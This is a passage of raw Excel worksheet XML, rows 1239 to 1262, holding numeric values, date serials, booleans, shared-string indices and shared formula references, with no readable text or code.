      </c>
      <c r="L1239" s="1">
        <v>24.0</v>
      </c>
      <c r="M1239" s="1">
        <v>45.0</v>
      </c>
      <c r="N1239" s="1" t="s">
        <v>2477</v>
      </c>
      <c r="O1239" s="1" t="s">
        <v>5333</v>
      </c>
      <c r="P1239" s="1" t="s">
        <v>1865</v>
      </c>
      <c r="Q1239" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1239" s="2">
        <f t="shared" si="2"/>
        <v>6</v>
      </c>
      <c r="S1239" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1240">
      <c r="A1240" s="1">
        <v>16854.0</v>
      </c>
      <c r="B1240" s="2" t="s">
        <v>5334</v>
      </c>
      <c r="C1240" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1240" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1240" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1240" s="1" t="s">
        <v>2152</v>
      </c>
      <c r="G1240" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1240" s="1" t="s">
        <v>5335</v>
      </c>
      <c r="I1240" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J1240" s="1" t="s">
        <v>5336</v>
      </c>
      <c r="K1240" s="2" t="s">
        <v>5337</v>
      </c>
      <c r="L1240" s="1">
        <v>6.0</v>
      </c>
      <c r="M1240" s="1">
        <v>8.0</v>
      </c>
      <c r="N1240" s="1" t="s">
        <v>5338</v>
      </c>
      <c r="O1240" s="1" t="s">
        <v>5339</v>
      </c>
      <c r="P1240" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1240" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1240" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1240" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1241">
      <c r="A1241" s="1">
        <v>16855.0</v>
      </c>
      <c r="B1241" s="2" t="s">
        <v>5340</v>
      </c>
      <c r="C1241" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1241" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1241" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1241" s="1" t="s">
        <v>5341</v>
      </c>
      <c r="G1241" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1241" s="1" t="s">
        <v>5342</v>
      </c>
      <c r="I1241" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1241" s="1" t="s">
        <v>5343</v>
      </c>
      <c r="K1241" s="2" t="s">
        <v>5344</v>
      </c>
      <c r="L1241" s="1">
        <v>7.0</v>
      </c>
      <c r="M1241" s="1">
        <v>13.0</v>
      </c>
      <c r="N1241" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1241" s="1" t="s">
        <v>5345</v>
      </c>
      <c r="P1241" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1241" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1241" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1241" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1242">
      <c r="A1242" s="1">
        <v>16867.0</v>
      </c>
      <c r="B1242" s="2" t="s">
        <v>5346</v>
      </c>
      <c r="C1242" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1242" s="2" t="s">
        <v>4988</v>
      </c>
      <c r="E1242" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1242" s="1" t="s">
        <v>4424</v>
      </c>
      <c r="G1242" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1242" s="4">
        <v>44236.54305555556</v>
      </c>
      <c r="I1242" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1242" s="1" t="s">
        <v>5343</v>
      </c>
      <c r="K1242" s="2" t="s">
        <v>5344</v>
      </c>
      <c r="L1242" s="1">
        <v>7.0</v>
      </c>
      <c r="M1242" s="1">
        <v>13.0</v>
      </c>
      <c r="N1242" s="1" t="s">
        <v>5347</v>
      </c>
      <c r="O1242" s="1" t="s">
        <v>5345</v>
      </c>
      <c r="P1242" s="1" t="s">
        <v>194</v>
      </c>
      <c r="Q1242" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R1242" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1242" s="1">
        <f t="shared" si="3"/>
        <v>1</v>
      </c>
    </row>
    <row r="1243">
      <c r="A1243" s="1">
        <v>16868.0</v>
      </c>
      <c r="B1243" s="2" t="s">
        <v>5348</v>
      </c>
      <c r="C1243" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1243" s="2" t="s">
        <v>5349</v>
      </c>
      <c r="E1243" s="2" t="s">
        <v>5350</v>
      </c>
      <c r="F1243" s="1" t="s">
        <v>5351</v>
      </c>
      <c r="G1243" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1243" s="4">
        <v>44841.45347222222</v>
      </c>
      <c r="I1243" s="1" t="s">
        <v>5352</v>
      </c>
      <c r="J1243" s="1" t="s">
        <v>5353</v>
      </c>
      <c r="K1243" s="2" t="s">
        <v>5354</v>
      </c>
      <c r="L1243" s="1">
        <v>7.0</v>
      </c>
      <c r="M1243" s="1">
        <v>36.0</v>
      </c>
      <c r="N1243" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1243" s="1" t="s">
        <v>5355</v>
      </c>
      <c r="P1243" s="1" t="s">
        <v>39</v>
      </c>
      <c r="Q1243" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1243" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1243" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1244">
      <c r="A1244" s="1">
        <v>16883.0</v>
      </c>
      <c r="B1244" s="2" t="s">
        <v>5356</v>
      </c>
      <c r="C1244" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1244" s="2" t="s">
        <v>5349</v>
      </c>
      <c r="E1244" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1244" s="1" t="s">
        <v>5357</v>
      </c>
      <c r="G1244" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1244" s="4">
        <v>44841.61597222222</v>
      </c>
      <c r="I1244" s="1" t="s">
        <v>5352</v>
      </c>
      <c r="J1244" s="1" t="s">
        <v>5353</v>
      </c>
      <c r="K1244" s="2" t="s">
        <v>5354</v>
      </c>
      <c r="L1244" s="1">
        <v>7.0</v>
      </c>
      <c r="M1244" s="1">
        <v>36.0</v>
      </c>
      <c r="N1244" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O1244" s="1" t="s">
        <v>5355</v>
      </c>
      <c r="P1244" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1244" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R1244" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1244" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="1245">
      <c r="A1245" s="1">
        <v>17103.0</v>
      </c>
      <c r="B1245" s="2" t="s">
        <v>5358</v>
      </c>
      <c r="C1245" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1245" s="2" t="s">
        <v>5359</v>
      </c>
      <c r="E1245" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1245" s="1" t="s">
        <v>5360</v>
      </c>
      <c r="G1245" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1245" s="1" t="s">
        <v>5361</v>
      </c>
      <c r="I1245" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1245" s="1" t="s">
        <v>5362</v>
      </c>
      <c r="K1245" s="2" t="s">
        <v>5363</v>
      </c>
      <c r="L1245" s="1">
        <v>3.0</v>
      </c>
      <c r="M1245" s="1">
        <v>10.0</v>
      </c>
      <c r="N1245" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1245" s="1" t="s">
        <v>5364</v>
      </c>
      <c r="P1245" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1245" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1245" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1245" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1246">
      <c r="A1246" s="1">
        <v>17112.0</v>
      </c>
      <c r="B1246" s="2" t="s">
        <v>5365</v>
      </c>
      <c r="C1246" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1246" s="2" t="s">
        <v>5359</v>
      </c>
      <c r="E1246" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1246" s="1" t="s">
        <v>5360</v>
      </c>
      <c r="G1246" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1246" s="1" t="s">
        <v>5366</v>
      </c>
      <c r="I1246" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1246" s="1" t="s">
        <v>5362</v>
      </c>
      <c r="K1246" s="2" t="s">
        <v>5363</v>
      </c>
      <c r="L1246" s="1">
        <v>3.0</v>
      </c>
      <c r="M1246" s="1">
        <v>10.0</v>
      </c>
      <c r="N1246" s="1" t="s">
        <v>5367</v>
      </c>
      <c r="O1246" s="1" t="s">
        <v>5364</v>
      </c>
      <c r="P1246" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1246" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1246" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1246" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1247">
      <c r="A1247" s="1">
        <v>17143.0</v>
      </c>
      <c r="B1247" s="2" t="s">
        <v>5368</v>
      </c>
      <c r="C1247" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1247" s="2" t="s">
        <v>4774</v>
      </c>
      <c r="E1247" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1247" s="1" t="s">
        <v>5369</v>
      </c>
      <c r="G1247" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1247" s="4">
        <v>44387.0375</v>
      </c>
      <c r="I1247" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J1247" s="1" t="s">
        <v>5370</v>
      </c>
      <c r="K1247" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1247" s="1">
        <v>6.0</v>
      </c>
      <c r="M1247" s="1">
        <v>9.0</v>
      </c>
      <c r="N1247" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1247" s="1" t="s">
        <v>5371</v>
      </c>
      <c r="P1247" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1247" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1247" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1247" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1248">
      <c r="A1248" s="1">
        <v>17144.0</v>
      </c>
      <c r="B1248" s="2" t="s">
        <v>5372</v>
      </c>
      <c r="C1248" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1248" s="2" t="s">
        <v>4774</v>
      </c>
      <c r="E1248" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1248" s="1" t="s">
        <v>5373</v>
      </c>
      <c r="G1248" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1248" s="4">
        <v>44387.07013888889</v>
      </c>
      <c r="I1248" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J1248" s="1" t="s">
        <v>5370</v>
      </c>
      <c r="K1248" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1248" s="1">
        <v>6.0</v>
      </c>
      <c r="M1248" s="1">
        <v>9.0</v>
      </c>
      <c r="N1248" s="1" t="s">
        <v>1776</v>
      </c>
      <c r="O1248" s="1" t="s">
        <v>5371</v>
      </c>
      <c r="P1248" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1248" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1248" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1248" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1249">
      <c r="A1249" s="1">
        <v>17145.0</v>
      </c>
      <c r="B1249" s="2" t="s">
        <v>5374</v>
      </c>
      <c r="C1249" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1249" s="2" t="s">
        <v>4774</v>
      </c>
      <c r="E1249" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1249" s="1" t="s">
        <v>5375</v>
      </c>
      <c r="G1249" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1249" s="4">
        <v>44387.089583333334</v>
      </c>
      <c r="I1249" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J1249" s="1" t="s">
        <v>5370</v>
      </c>
      <c r="K1249" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1249" s="1">
        <v>6.0</v>
      </c>
      <c r="M1249" s="1">
        <v>9.0</v>
      </c>
      <c r="N1249" s="1" t="s">
        <v>433</v>
      </c>
      <c r="O1249" s="1" t="s">
        <v>5371</v>
      </c>
      <c r="P1249" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1249" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1249" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1249" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1250">
      <c r="A1250" s="1">
        <v>17146.0</v>
      </c>
      <c r="B1250" s="2" t="s">
        <v>5376</v>
      </c>
      <c r="C1250" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1250" s="2" t="s">
        <v>4774</v>
      </c>
      <c r="E1250" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1250" s="1" t="s">
        <v>5373</v>
      </c>
      <c r="G1250" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1250" s="4">
        <v>44387.09097222222</v>
      </c>
      <c r="I1250" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J1250" s="1" t="s">
        <v>5370</v>
      </c>
      <c r="K1250" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1250" s="1">
        <v>6.0</v>
      </c>
      <c r="M1250" s="1">
        <v>9.0</v>
      </c>
      <c r="N1250" s="1" t="s">
        <v>514</v>
      </c>
      <c r="O1250" s="1" t="s">
        <v>5371</v>
      </c>
      <c r="P1250" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1250" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1250" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1250" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1251">
      <c r="A1251" s="1">
        <v>17149.0</v>
      </c>
      <c r="B1251" s="2" t="s">
        <v>5377</v>
      </c>
      <c r="C1251" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1251" s="2" t="s">
        <v>4774</v>
      </c>
      <c r="E1251" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F1251" s="1" t="s">
        <v>5378</v>
      </c>
      <c r="G1251" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1251" s="5">
        <v>44479.04791666667</v>
      </c>
      <c r="I1251" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J1251" s="1" t="s">
        <v>5370</v>
      </c>
      <c r="K1251" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1251" s="1">
        <v>6.0</v>
      </c>
      <c r="M1251" s="1">
        <v>9.0</v>
      </c>
      <c r="N1251" s="1" t="s">
        <v>1038</v>
      </c>
      <c r="O1251" s="1" t="s">
        <v>5371</v>
      </c>
      <c r="P1251" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1251" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1251" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1251" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1252">
      <c r="A1252" s="1">
        <v>17152.0</v>
      </c>
      <c r="B1252" s="2" t="s">
        <v>5379</v>
      </c>
      <c r="C1252" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1252" s="2" t="s">
        <v>4774</v>
      </c>
      <c r="E1252" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1252" s="1" t="s">
        <v>5380</v>
      </c>
      <c r="G1252" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1252" s="5">
        <v>44481.69583333333</v>
      </c>
      <c r="I1252" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1252" s="1" t="s">
        <v>5381</v>
      </c>
      <c r="K1252" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1252" s="1">
        <v>5.0</v>
      </c>
      <c r="M1252" s="1">
        <v>11.0</v>
      </c>
      <c r="N1252" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1252" s="1" t="s">
        <v>5382</v>
      </c>
      <c r="P1252" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1252" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1252" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1252" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1253">
      <c r="A1253" s="1">
        <v>17153.0</v>
      </c>
      <c r="B1253" s="2" t="s">
        <v>5383</v>
      </c>
      <c r="C1253" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1253" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1253" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1253" s="1" t="s">
        <v>1402</v>
      </c>
      <c r="G1253" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1253" s="5">
        <v>44481.739583333336</v>
      </c>
      <c r="I1253" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1253" s="1" t="s">
        <v>5381</v>
      </c>
      <c r="K1253" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1253" s="1">
        <v>5.0</v>
      </c>
      <c r="M1253" s="1">
        <v>11.0</v>
      </c>
      <c r="N1253" s="1" t="s">
        <v>2053</v>
      </c>
      <c r="O1253" s="1" t="s">
        <v>5382</v>
      </c>
      <c r="P1253" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1253" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1253" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1253" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1254">
      <c r="A1254" s="1">
        <v>17154.0</v>
      </c>
      <c r="B1254" s="2" t="s">
        <v>3344</v>
      </c>
      <c r="C1254" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1254" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1254" s="2" t="s">
        <v>2251</v>
      </c>
      <c r="F1254" s="1" t="s">
        <v>112</v>
      </c>
      <c r="G1254" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1254" s="5">
        <v>44481.788194444445</v>
      </c>
      <c r="I1254" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1254" s="1" t="s">
        <v>5381</v>
      </c>
      <c r="K1254" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1254" s="1">
        <v>5.0</v>
      </c>
      <c r="M1254" s="1">
        <v>11.0</v>
      </c>
      <c r="N1254" s="1" t="s">
        <v>2477</v>
      </c>
      <c r="O1254" s="1" t="s">
        <v>5382</v>
      </c>
      <c r="P1254" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1254" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1254" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1254" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1255">
      <c r="A1255" s="1">
        <v>17155.0</v>
      </c>
      <c r="B1255" s="2" t="s">
        <v>5384</v>
      </c>
      <c r="C1255" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1255" s="2" t="s">
        <v>4804</v>
      </c>
      <c r="E1255" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1255" s="1" t="s">
        <v>5385</v>
      </c>
      <c r="G1255" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1255" s="5">
        <v>44481.98888888889</v>
      </c>
      <c r="I1255" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1255" s="1" t="s">
        <v>5381</v>
      </c>
      <c r="K1255" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1255" s="1">
        <v>5.0</v>
      </c>
      <c r="M1255" s="1">
        <v>11.0</v>
      </c>
      <c r="N1255" s="1" t="s">
        <v>1858</v>
      </c>
      <c r="O1255" s="1" t="s">
        <v>5382</v>
      </c>
      <c r="P1255" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1255" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1255" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1255" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1256">
      <c r="A1256" s="1">
        <v>17159.0</v>
      </c>
      <c r="B1256" s="2" t="s">
        <v>5386</v>
      </c>
      <c r="C1256" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1256" s="2" t="s">
        <v>4804</v>
      </c>
      <c r="E1256" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1256" s="1" t="s">
        <v>5380</v>
      </c>
      <c r="G1256" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1256" s="5">
        <v>44512.455555555556</v>
      </c>
      <c r="I1256" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1256" s="1" t="s">
        <v>5381</v>
      </c>
      <c r="K1256" s="2" t="s">
        <v>735</v>
      </c>
      <c r="L1256" s="1">
        <v>5.0</v>
      </c>
      <c r="M1256" s="1">
        <v>11.0</v>
      </c>
      <c r="N1256" s="1" t="s">
        <v>317</v>
      </c>
      <c r="O1256" s="1" t="s">
        <v>5382</v>
      </c>
      <c r="P1256" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1256" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R1256" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S1256" s="1">
        <f t="shared" si="3"/>
        <v>4</v>
      </c>
    </row>
    <row r="1257">
      <c r="A1257" s="1">
        <v>17168.0</v>
      </c>
      <c r="B1257" s="2" t="s">
        <v>5387</v>
      </c>
      <c r="C1257" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1257" s="2" t="s">
        <v>4804</v>
      </c>
      <c r="E1257" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1257" s="1" t="s">
        <v>5388</v>
      </c>
      <c r="G1257" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1257" s="1" t="s">
        <v>5389</v>
      </c>
      <c r="I1257" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1257" s="1" t="s">
        <v>5390</v>
      </c>
      <c r="K1257" s="2" t="s">
        <v>5391</v>
      </c>
      <c r="L1257" s="1">
        <v>4.0</v>
      </c>
      <c r="M1257" s="1">
        <v>5.0</v>
      </c>
      <c r="N1257" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1257" s="1" t="s">
        <v>5392</v>
      </c>
      <c r="P1257" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q1257" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1257" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S1257" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1258">
      <c r="A1258" s="1">
        <v>17171.0</v>
      </c>
      <c r="B1258" s="2" t="s">
        <v>5393</v>
      </c>
      <c r="C1258" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1258" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1258" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1258" s="1" t="s">
        <v>3332</v>
      </c>
      <c r="G1258" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1258" s="1" t="s">
        <v>5394</v>
      </c>
      <c r="I1258" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1258" s="1" t="s">
        <v>5390</v>
      </c>
      <c r="K1258" s="2" t="s">
        <v>5391</v>
      </c>
      <c r="L1258" s="1">
        <v>4.0</v>
      </c>
      <c r="M1258" s="1">
        <v>5.0</v>
      </c>
      <c r="N1258" s="1" t="s">
        <v>5395</v>
      </c>
      <c r="O1258" s="1" t="s">
        <v>5392</v>
      </c>
      <c r="P1258" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1258" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1258" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1258" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1259">
      <c r="A1259" s="1">
        <v>17172.0</v>
      </c>
      <c r="B1259" s="2" t="s">
        <v>5396</v>
      </c>
      <c r="C1259" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1259" s="2" t="s">
        <v>5397</v>
      </c>
      <c r="E1259" s="2" t="s">
        <v>5398</v>
      </c>
      <c r="F1259" s="1" t="s">
        <v>218</v>
      </c>
      <c r="G1259" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1259" s="1" t="s">
        <v>5399</v>
      </c>
      <c r="I1259" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1259" s="1" t="s">
        <v>5390</v>
      </c>
      <c r="K1259" s="2" t="s">
        <v>5391</v>
      </c>
      <c r="L1259" s="1">
        <v>4.0</v>
      </c>
      <c r="M1259" s="1">
        <v>5.0</v>
      </c>
      <c r="N1259" s="1" t="s">
        <v>5400</v>
      </c>
      <c r="O1259" s="1" t="s">
        <v>5392</v>
      </c>
      <c r="P1259" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q1259" s="1">
        <f t="shared" si="1"/>
        <v>3</v>
      </c>
      <c r="R1259" s="2">
        <f t="shared" si="2"/>
        <v>3</v>
      </c>
      <c r="S1259" s="1">
        <f t="shared" si="3"/>
        <v>6</v>
      </c>
    </row>
    <row r="1260">
      <c r="A1260" s="1">
        <v>17173.0</v>
      </c>
      <c r="B1260" s="2" t="s">
        <v>5401</v>
      </c>
      <c r="C1260" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1260" s="2" t="s">
        <v>5402</v>
      </c>
      <c r="E1260" s="2" t="s">
        <v>2103</v>
      </c>
      <c r="F1260" s="1" t="s">
        <v>2663</v>
      </c>
      <c r="G1260" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H1260" s="4">
        <v>44229.64097222222</v>
      </c>
      <c r="I1260" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1260" s="1" t="s">
        <v>5403</v>
      </c>
      <c r="K1260" s="2" t="s">
        <v>5404</v>
      </c>
      <c r="L1260" s="1">
        <v>4.0</v>
      </c>
      <c r="M1260" s="1">
        <v>7.0</v>
      </c>
      <c r="N1260" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O1260" s="1" t="s">
        <v>5405</v>
      </c>
      <c r="P1260" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1260" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1260" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1260" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1261">
      <c r="A1261" s="1">
        <v>17178.0</v>
      </c>
      <c r="B1261" s="2" t="s">
        <v>5406</v>
      </c>
      <c r="C1261" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1261" s="2" t="s">
        <v>4804</v>
      </c>
      <c r="E1261" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F1261" s="1" t="s">
        <v>2612</v>
      </c>
      <c r="G1261" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H1261" s="1" t="s">
        <v>5407</v>
      </c>
      <c r="I1261" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J1261" s="1" t="s">
        <v>5403</v>
      </c>
      <c r="K1261" s="2" t="s">
        <v>5404</v>
      </c>
      <c r="L1261" s="1">
        <v>4.0</v>
      </c>
      <c r="M1261" s="1">
        <v>7.0</v>
      </c>
      <c r="N1261" s="1" t="s">
        <v>5408</v>
      </c>
      <c r="O1261" s="1" t="s">
        <v>5405</v>
      </c>
      <c r="P1261" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q1261" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R1261" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S1261" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="1262">
      <c r="A1262" s="1">
        <v>17179.0</v>
      </c>
      <c r="B1262" s="2" t="s">
        <v>5409</v>
      </c>
      <c r="C1262" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D1262" s="2" t="s">
        <v>4995</v>
      </c>
      <c r="E1262" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F1262" s="1" t="s">
        <v>420</v>
      </c>
